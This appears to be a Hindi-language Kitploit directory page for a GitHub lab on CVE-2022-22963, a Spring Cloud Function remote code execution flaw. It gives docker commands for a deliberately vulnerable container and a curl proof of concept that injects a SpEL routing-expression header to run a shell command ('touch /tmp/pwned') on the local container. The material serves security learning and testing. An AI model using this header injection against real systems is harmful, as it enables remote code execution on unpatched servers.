Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22963 — Spring Cloud Function कमजोर अनुप्रयोग / CVE-2022-22963 | Kitploit
उपकरण/GitHubGitHub/me2nuk/cve-2022-22963
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubme2nuk/cve-2022-22963

CVE-2022-22963

Spring Cloud Function कमजोर अनुप्रयोग / CVE-2022-22963

रिपॉजिटरी देखें
1924 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Spring Cloud Function भेद्यता (CVE-2022-22963)

CVE-2022-22963 के प्रति संवेदनशील अनुप्रयोग

CVE-2022-22963 शोषण डेमो

https://user-images.githubusercontent.com/57348147/161266562-51d025f0-54d4-488f-ac50-2317e29bfbdf.mp4

निर्माण

root@kitploit:~
docker pull me2nuk/cves:2022-22963
docker run -it -p 8080:8080 --name=vuln me2nuk/cves:2022-22963

POC

root@kitploit:~
curl -X POST  http://0.0.0.0:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/pwned")' --data-raw 'data' -v
docker exec -it --user=root vuln ls /tmp

संदर्भ

  • https://tanzu.vmware.com/security/cve-2022-22963
  • https://github.com/hktalent/spring-spel-0day-poc/blob/main/README.md
  • https://github.com/spring-cloud/spring-cloud-function
  • https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/
टूल डाउनलोड करें